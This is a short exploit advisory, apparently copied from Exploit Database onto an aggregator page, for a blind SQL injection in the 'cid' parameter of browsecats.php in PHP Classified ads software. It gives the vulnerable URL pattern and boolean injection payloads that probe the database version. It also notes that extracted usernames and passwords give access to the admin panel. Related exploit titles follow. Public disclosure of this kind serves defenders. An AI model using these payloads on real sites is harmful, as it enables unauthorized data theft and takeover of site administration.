PHP Classified ads software – ‘cid’ Blind SQL Injection

Exploit Database
11 阅读

作者： h4ck3r

日期： 2011-01-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/16062/

==
[-]Author: BorN To K!LL - h4ck3r
[-]Contact: SQL@hotmail.co.uk
==
[-]Script: PHP Classified ads software
[-]Version: n/a
[-]Link: http://www.softbizsolutions.com/classified-ads-software.php
==
[-]3xploit:
[path]/browsecats.php?cid=[Blind-Injection]

[-]3xample:
[path]/browsecats.php?cid=2 and substring(version(),1,1)=4 // false ,,
[path]/browsecats.php?cid=2 and substring(version(),1,1)=5 // true ,,

[-]Note:
after getting the username and the password you can login to admin panel
[path]/admin
==
[-]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"

last Exploits
PHP Classified ads software – ‘cid’ Blind SQL Injection的更多信息

Omnistar Mailer – Multiple SQL Injections / HTML Injection Vulnerabilities：
Concrete5 CME v9.1.3 – Xpath injection：
AWStats Totals 1.14 multisort – Remote Command Execution (Metasploit)：
Lotus Sametime 8.5.1 – Password Disclosure：
ManageEngine AssetExplorer 6.2.0 – Cross-Site Scripting：
WordPress Plugin Shopping Cart 3.0.4 – Unrestricted Arbitrary File Upload：
iTech Social Networking Script 3.08 – SQL Injection：
Job Board Script – ‘nice_theme’ SQL Injection：